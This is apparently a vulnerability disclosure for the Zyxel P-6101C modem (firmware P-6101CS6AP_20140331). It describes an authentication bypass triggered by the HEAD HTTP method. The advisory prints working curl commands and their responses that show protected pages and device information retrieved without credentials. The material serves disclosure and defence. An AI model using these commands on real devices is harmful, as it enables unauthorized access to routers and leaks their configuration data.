- Zyxel P-6101C
- Firmware Version P-6101CS6AP_20140331
- https://fcc.report/FCC-ID/I88P6101C/
The web protocol of Zyxel P-6101C Modem allows an attacker to bypass authentication using the HEAD HTTP method.
Exploitation requires sending a specially crafted packet.
No privileges required.
High
High
High
(9.8) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-863: Incorrect Authorization
Initially, when using curl to send a request without providing a password, the response will be 401 Unauthorized.
curl <TARGET>
<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY><H1>401 Unauthorized</H1>
Your client does not have permission to get URL /cgi-bin/index.asp from this server.
</BODY></HTML>
However, by sending the same request with the HEAD method, it is possible to bypass the authentication and retrieve sensitive information from the device.
curl -X HEAD <TARGET>
Warning: Setting custom HTTP method to HEAD with -X/--request may not work the
Warning: way you want. Consider using -I/--head instead.
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv=Content-Script-Type content=text/javascript>
<meta http-equiv=Content-Style-Type content=text/css>
</head>
<frameset rows="13%,87%">
<frame src="/cgi-bin/status.asp" name="header" frameborder="0" scrolling="NO" noresize="noresize">
<frameset cols="20%,80%">
<frame src="/cgi-bin/menu.asp" name="navigation" frameborder="0" id="panel" scrolling="NO" noresize="noresize">
<frame name="main"
src="/cgi-bin/status_deviceinfo.asp"
Device information can also be obtained by using the following command to download the page and then opening it in a browser.
curl -X HEAD <TARGET>/cgi-bin/status_deviceinfo.asp -o status_deviceinfo
- Chiao-Lin Yu (Steven Meow)
- 2024/10/